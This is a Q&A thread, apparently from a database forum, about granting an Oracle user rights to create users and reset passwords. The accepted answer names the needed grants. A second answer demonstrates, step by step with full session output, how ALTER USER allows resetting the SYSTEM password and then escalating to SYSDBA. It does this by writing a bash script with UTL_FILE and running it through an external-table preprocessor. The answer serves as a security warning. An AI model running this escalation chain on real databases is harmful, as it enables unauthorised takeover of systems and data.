# Oracle - How do I grant a user permission to create and change passwords for other users (like a security admin)

Tags: oracle, security

I have a user that is a security admin in the I.t. dept. I need to grant his Oracle user account privileges to be able to create new users, change passwords and change membership in other groups we created. This is basically a security admin that I do not want to give full sysdba/dba privileges to. That would be overkill. What exactly do I grant and how?

Answer (score 1, accepted):

You just need to [GRANT](https://docs.oracle.com/cd/B19306_01/server.102/b14200/statements_9013.htm) them the [CREATE USER](https://docs.oracle.com/cd/B19306_01/server.102/b14200/statements_8003.htm) and [ALTER USER](https://docs.oracle.com/cd/B19306_01/server.102/b14200/statements_4003.htm) system privileges.

E.g: `GRANT ALTER USER TO UserAccountWithPermission;`

Answer (score 2):

You may grant `ALTER USER` and `CREATE USER` to that user to get this done. By doing that, you also grant unlimited access indirectly to that user in most databases, which you wanted to avoid.

```
Connected to:
Oracle Database 19c Enterprise Edition Release 19.0.0.0.0 - Production
Version 19.9.0.0.0

SQL> create user u1 identified by u1;

User created.

SQL> grant create session, alter user to u1;

Grant succeeded.

SQL> conn u1/u1
Connected.
SQL> alter user system identified by system;

User altered.

SQL> conn system/system
Connected.
SQL> show user
USER is "SYSTEM"
```

That was all it took to gain access to `SYSTEM` or any other privileged user besides `SYS`. This already provides read/write access to the filesystem as database user.

```
SQL> select SYS_CONTEXT ('USERENV','ORACLE_HOME') as home,
            SYS_CONTEXT ('USERENV','INSTANCE_NAME') as instance from dual;

HOME                                     INSTANCE
---------------------------------------- --------------------
/u01/app/oracle/product/19.0.0/dbhome_1  RYMIN19

SQL> create directory exploitd1 as '/tmp';

Directory created.

SQL> create directory exploitd2 as '/usr/bin';

Directory created.

SQL> declare
  fhandle  utl_file.file_type;
begin
  fhandle := utl_file.fopen('EXPLOITD1', 'data.txt', 'w');
  utl_file.put(fhandle, '#!/bin/bash' || CHR(10));
  utl_file.put(fhandle, 'export ORACLE_HOME=/u01/app/oracle/product/19.0.0/dbhome_1' || CHR(10));
  utl_file.put(fhandle, 'export PATH=$ORACLE_HOME/bin:$PATH' || CHR(10));
  utl_file.put(fhandle, 'export ORACLE_SID=RYMIN19' || CHR(10));
  utl_file.put(fhandle, 'sqlplus / as sysdba<<EOF' || CHR(10));
  utl_file.put(fhandle, 'grant sysdba to u1;' || CHR(10));
  utl_file.put(fhandle, 'exit' || CHR(10));
  utl_file.put(fhandle, 'EOF');
  utl_file.fclose(fhandle);
end;
/

PL/SQL procedure successfully completed.
```

Next create an external table using the above script executed with bash as preprocessor:

```
SQL> CREATE TABLE exploit_table (c1 varchar2(2000))
ORGANIZATION EXTERNAL (
TYPE ORACLE_LOADER
DEFAULT DIRECTORY exploitd1
ACCESS PARAMETERS (
RECORDS DELIMITED BY NEWLINE
PREPROCESSOR exploitd2:'bash'
DISABLE_DIRECTORY_LINK_CHECK
FIELDS (c1 char(2000)))
LOCATION ('data.txt'))
REJECT LIMIT UNLIMITED;

Table created.

SQL>
```

And here comes the fun part:

```
SQL> select USERNAME, SYSDBA from v$pwfile_users;

USERNAME                       SYSDB
------------------------------ -----
SYS                            TRUE

SQL> select count(*) from exploit_table;

  COUNT(*)
----------
        16

SQL> select USERNAME, SYSDBA from v$pwfile_users;

USERNAME                       SYSDB
------------------------------ -----
SYS                            TRUE
U1                             TRUE

SQL>
```

If you want to really limit the privileges of this security admin, you will need some custom PL/SQL trigger or package/procedure that controls which users can be created and altered by this user.